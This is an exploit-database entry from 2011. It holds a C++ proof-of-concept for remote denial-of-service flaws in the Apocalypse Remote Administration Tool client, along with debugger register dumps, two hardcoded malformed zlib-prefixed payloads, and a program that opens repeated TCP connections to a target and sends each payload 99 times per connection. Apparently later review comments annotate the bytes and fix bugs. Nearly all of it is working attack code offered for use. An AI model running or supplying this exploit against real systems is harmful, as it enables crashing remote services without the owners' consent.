Apocalypse Remote Administration Tool v1.4 R2 multiple vulnerabilities

2011-05-30T00:00:00
ID 1337DAY-ID-16213
Type zdt
Reporter Kevin R.V
Modified 2011-05-30T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            /*  Apocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities
 *  Author: Kevin R.V <[email protected]> 
 *    Date: 2011
 * License: Totally free 8-)
 * 
 * */
 
 
 /*
    Access violation when trying to write to 0x000003F4
    EAX 00000000
	ECX 00000000
	EDX 00000000
	EBX 02E6CC88
	ESP 00103ED0
	EBP 00103F04
	ESI 00000000
	EDI 00458CA4 Client.00458CA4
	EIP 00509AB5 Client.00509AB5
	C 0  ES 0023 32bit 0(FFFFFFFF)
	P 1  CS 001B 32bit 0(FFFFFFFF)
	A 0  SS 0023 32bit 0(FFFFFFFF)
	Z 1  DS 0023 32bit 0(FFFFFFFF)
	S 0  FS 003B 32bit 7FFDE000(FFF)
	T 0  GS 0000 NULL
	D 0
	O 0  LastErr ERROR_SUCCESS (00000000)
	EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
	MM0           0.0,  1.121039e-44
	MM1 +NAN 7FFDE6F4,  8.506428e+33
	MM2 -9.846953e+26, -6.258335e+15
	MM3 -8.745139e+07,   0.005859086
	MM4 -2.466859e-33, -6.343342e-15
	MM5 -1.084202e-19,           0.0
	MM6 -2.466859e-33, -6.343342e-15
	MM7           0.0,           0.0 */

/* 

	Stack overflow

	EAX 034D1694
	ECX 00498E00 Client.00498E00
	EDX 00000690
	EBX 034D1694
	ESP 0003251C
	EBP 00033518
	ESI 021901D1
	EDI 000335D8
	EIP 0049A3DD Client.0049A3DD
	C 1  ES 0023 32bit 0(FFFFFFFF)
	P 0  CS 001B 32bit 0(FFFFFFFF)
	A 0  SS 0023 32bit 0(FFFFFFFF)
	Z 0  DS 0023 32bit 0(FFFFFFFF)
	S 0  FS 003B 32bit 7FFDE000(FFF)
	T 0  GS 0000 NULL
	D 0
	O 0  LastErr ERROR_SUCCESS (00000000)
	EFL 00010203 (NO,B,NE,BE,NS,PO,GE,G)
	MM0           0.0,  1.121039e-44
	MM1 +NAN 7FFDE6F4,  8.506428e+33
	MM2 -1.570600e-32,  5.571002e-41
	MM3     -1.196440,     -1.191965
	MM4  -0.008783944,     -1.009549
	MM5  5.791298e-39,           0.0
	MM6 -5.082198e-21,           0.0
	MM7 -7.754818e-26,           0.0 */



#include <cstdlib>
#include <cstring>
#include <iostream>
#include <winsock2.h>

/* Version string of this proof of concept; main() appends it to the banner literal. */
#define VERS "0.1"

/* Process-wide flag. PoC() sets it to 1 after its first successful connect()
 * and reads it once connect() fails, to choose between the "crashed" and the
 * "not detected" message. As a namespace-scope int it starts at zero. */
int   connected;
using namespace std;


/*
 * Message sent when the caller selects vuln type 0 (see PoC()).
 *
 * Layout as far as the bytes themselves show (371 bytes in total):
 *   - 0x33 0x36 0x37 0x7C is ASCII "367|". Exactly 367 bytes follow the '|',
 *     so this looks like a decimal length prefix plus delimiter. The
 *     protocol is not documented on this page, so confirm before relying
 *     on it.
 *   - The next two bytes, 0x78 0x01, form a valid zlib stream header, so
 *     the body is presumably zlib-compressed data. It was not inflated
 *     for this review.
 *
 * The author's first register dump above (write access violation at
 * 0x000003F4 inside Client) presumably belongs to this message.
 *
 * NOTE(review): many values exceed 0x7F. Where plain char is signed, C++11
 * and later reject that as a narrowing conversion in a braced initializer,
 * so this only builds in a pre-C++11 mode. Changing the element type would
 * also require touching the sendto() calls in PoC().
 */
char Access_violation[] = 
{
	0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x40,0x10,
	0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
	0x93,0xD6,0x5B,0x7F,0xA2,0xF4,0x90,0x52,0x48,0x40, 0xC1,0x88,0x2C,0x49,
	0x1A,0x57,0xD2,0xDD,0x92,0x4D,0x51,0x61,0xEF,0xBE,0x40,0x5F,0x40,
	0xF0,0x15,0x04,0x8F,0xDE,0xF5,0xE6,0x13,0x14,0xBC,0x2A,0x82,0x07,
	0xC1,0x93,0x13,0x2C,0xD8,0x43,0x85,0x7E,0xC3,0x0C,0xDF,0xCC,0xCE,
	0xCC,0xCE,0x4C,0x87,0xA5,0x19,0x13,0x9A,0x4D,0x64,0xC4,0xB2,0xEB,
	0x89,0x4A,0x80,0xE2,0x05,0x3D,0x6B,0x58,0xDD,0x0E,0xC6,0x2D,0x4B,
	0x07,0x89,0x2A,0xB8,0x48,0xCD,0x61,0xA4,0x03,0xD7,0x0F,0xFA,0x83,
	0x43,0xB3,0x6D,0xB7,0x5D,0x52,0xEF,0x68,0x42,0x9D,0x1A,0x06,0x21,
	0x7A,0x20,0x0B,0xD4,0x17,0xAA,0x60,0x59,0x96,0xC4,0x9A,0xD4,0xAC,
	0x9A,0x85,0x3A,0xD3,0x14,0x1D,0xF0,0x2B,0xF0,0xA9,0x8D,0xB5,0x3F,
	0x61,0x5C,0x94,0x56,0x70,0x75,0xAE,0xDB,0xF1,0x98,0x03,0x29,0x72,
	0x56,0xC8,0x5C,0x53,0xD2,0x22,0xDA,0x78,0xFC,0xDA,0x31,0x00,0xFA,
	0x88,0x8B,0x58,0x5E,0x2A,0x74,0x3C,0x44,0x7B,0xC3,0x5C,0x8E,0x12,
	0xA5,0xB8,0x14,0x2C,0xAB,0x6A,0x0C,0xD2,0xDD,0x0F,0x4B,0xED,0xC9,
	0x68,0x3A,0x4E,0x44,0xA1,0x10,0x13,0x31,0xF2,0x93,0xA2,0x9C,0x51,
	0x85,0x7F,0xC3,0x86,0xAE,0x8A,0x72,0x0E,0xDD,0xB9,0x5C,0xB3,0xC0,
	0xE3,0x0A,0xC5,0x8B,0xB6,0x52,0xAD,0x59,0xD4,0x95,0x62,0xC4,0xD3,
	0x69,0xCE,0x22,0xFE,0x29,0x50,0x56,0x5E,0x32,0xEC,0xC1,0x52,0xD0,
	0x2A,0x41,0x93,0x5C,0xA6,0x39,0x1B,0xB3,0x50,0xBB,0xFE,0xD2,0x6D,
	0xF5,0x1D,0xAC,0x59,0xEA,0x26,0x68,0xA3,0x41,0x1D,0xCB,0xB4,0x2D,
	0x6C,0x62,0xBB,0x45,0x5B,0x4D,0x62,0xD2,0x3A,0x26,0x96,0x51,0x83,
	0xB7,0x36,0xA5,0x26,0x06,0x10,0xE0,0x25,0xE2,0x53,0xEF,0xF9,0xFB,
	0x63,0x6B,0x77,0x56,0xAD,0xBC,0xBF,0x94,0x09,0x00,0xF7,0x66,0xEE,
	0xDD,0xDF,0x56,0x7E,0x9D,0x15,0xD6,0xB1,0x9B,0xD8,0x59,0xC4,0x1F,
	0xE0,0xC3,0x99,0xF1,0x14,0x18,0x1B,0x86,0x41,0xE9,0x8A,0xE4,0xA5,
	0xD0,0xC9,0xC5,0xEB,0xDB,0x36,0xF8,0xFF,0xCC,0xE7,0x8D,0xE7,0x9E,
	0xFE,0x01,0xF0,0xF2,0xA8,0x97
};

/*
 * Message sent when the caller selects any vuln type other than 0 (see PoC()).
 *
 * 26 bytes. They equal the first 26 bytes of Access_violation except for
 * byte index 11, which is 0x00 here and 0x40 there. The ASCII prefix is
 * still "367|", but only 22 bytes follow it, so the message announces far
 * more data than it carries (assuming the prefix is a length field; the
 * protocol is not documented on this page).
 *
 * The author's second register dump above is labelled "Stack overflow" and
 * presumably belongs to this message. The page does not say which client
 * routine fails or why.
 *
 * NOTE(review): the same signed-char narrowing caveat applies as for
 * Access_violation (0x8D, 0xCD, ... exceed 0x7F).
 */
char stack[] =
{
	0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x00,0x10,
	0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
};
	



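/*
 * Opens a TCP connection to host:port. On success it writes the selected
 * message 99 times on that connection, then calls itself to open the next
 * connection. The chain ends at the first connect() that fails.
 *
 * host  dotted-quad IPv4 string, handed to inet_addr() unvalidated.
 * port  TCP port; only the low 16 bits reach htons().
 * vuln  0 selects Access_violation, any other value selects stack.
 *
 * Returns the value of the global `connected` flag at the point where
 * connect() failed: 1 if any earlier connect() succeeded, 0 otherwise.
 * The original had no return statement, which is undefined behaviour for a
 * non-void function; every path now returns a value.
 *
 * NOTE(review): the "crashed" message is inferred only from connect()
 * failing after an earlier success. A firewall drop, a listener restart or
 * any network interruption prints the same line, so confirm the result on
 * the lab host itself (the author's dumps come from a debugger attached to
 * Client).
 *
 * NOTE(review): the results of WSAStartup(), socket(), inet_addr() and
 * sendto() are never checked and no socket is ever closed. Each level of
 * recursion adds a stack frame and an open handle. The connection pattern
 * is left exactly as published; only the missing return value and the
 * uninitialised sockaddr padding are fixed here.
 */
int PoC(char * host, unsigned int port, unsigned int vuln)
{
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0),&wsa);
	SOCKET sock;
	/* Value-initialise so sin_zero does not carry stack garbage. */
	struct sockaddr_in  local = sockaddr_in();
	sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	local.sin_family = AF_INET;
	local.sin_addr.s_addr = inet_addr(host);
	local.sin_port = htons(port);
	if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
	{
		connected = 1;
		cout << ".";
		for(int i = 0; i<99; i++)
		{
			/* On a connected stream socket the address arguments of
			 * sendto() are ignored, so these are plain TCP writes. */
			if ( vuln == 0 )
			{
				sendto(sock, Access_violation, sizeof(Access_violation), 0, (struct sockaddr *)&local,sizeof(local));
			}
			else
			{
				sendto(sock, stack, sizeof(stack), 0, (struct sockaddr *)&local,sizeof(local));
			}
		}

		/* Next connection; the innermost call's result is passed up. */
		return PoC(host, port, vuln);
	}

	if ( connected )
	{
		cout << endl << endl << "[+] Congrats Apocalypse crashed!" << endl;
	}
	else
	{
		cout << endl << endl << "[-] Sorry not Apocalypse detected :(" << endl;
	}
	return connected;
}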
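/*
 * Entry point: prints the banner, parses -h <ip> -p <port> -v <vuln type>
 * and passes the values to PoC().
 *
 * Changes from the published version:
 *   - a flag given as the last argument no longer reads argv[i+1] past the
 *     supplied values (argv[argc] is a null pointer, so atoi() on it crashed);
 *   - ip and port are no longer used uninitialised when -h or -p is missing;
 *   - the port must be a whole decimal number in 1..65535; the original let
 *     atoi() wrap silently into u_short, which could point the tool at a
 *     port other than the one typed;
 *   - the `! strcmp(...) != 0` tests are written as `strcmp(...) == 0`.
 *
 * Exit statuses are unchanged: exit(-1) on a usage error, 1 after PoC().
 */
int main(int argc, char *argv[])
{
	cout << "\nApocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities" VERS << endl << endl;
	cout << "by Kevin R.V <[email protected]" << endl;

	char * ip = 0;
	long port_arg = -1;
	u_short v_type = 0;
	bool usage_error = ( argc < 6 );

	for(int i = 1; !usage_error && i < argc; i++)
	{
		const bool is_host = ( strcmp(argv[i], "-h") == 0 );
		const bool is_port = ( strcmp(argv[i], "-p") == 0 );
		const bool is_vuln = ( strcmp(argv[i], "-v") == 0 );

		/* Unknown arguments are ignored, as in the original. */
		if ( !is_host && !is_port && !is_vuln )
			continue;

		/* Every flag needs a value after it. */
		if ( i + 1 >= argc )
		{
			usage_error = true;
			break;
		}

		char * value = argv[++i];
		if ( is_host )
		{
			ip = value;
		}
		else if ( is_port )
		{
			char * end = 0;
			port_arg = strtol(value, &end, 10);
			/* Reject empty input and trailing non-digits. */
			if ( end == value || *end != '\0' )
				port_arg = -1;
		}
		else
		{
			v_type = static_cast<u_short>(atoi(value));
		}
	}

	if ( usage_error || ip == 0 || port_arg < 1 || port_arg > 65535 )
	{
		cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port> -v <vuln type>" << endl << endl;
		cout << "vuln list : " << endl;
		cout << "0- Access violation, try to write in not allowed memory" << endl;
		cout << "1- Stack overflow" << endl;
		exit(-1);
	}

	const u_short port = static_cast<u_short>(port_arg);

	cout << "[+] Starting exploit" << endl << endl;
	PoC(ip, port, v_type);

	return 1;
}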


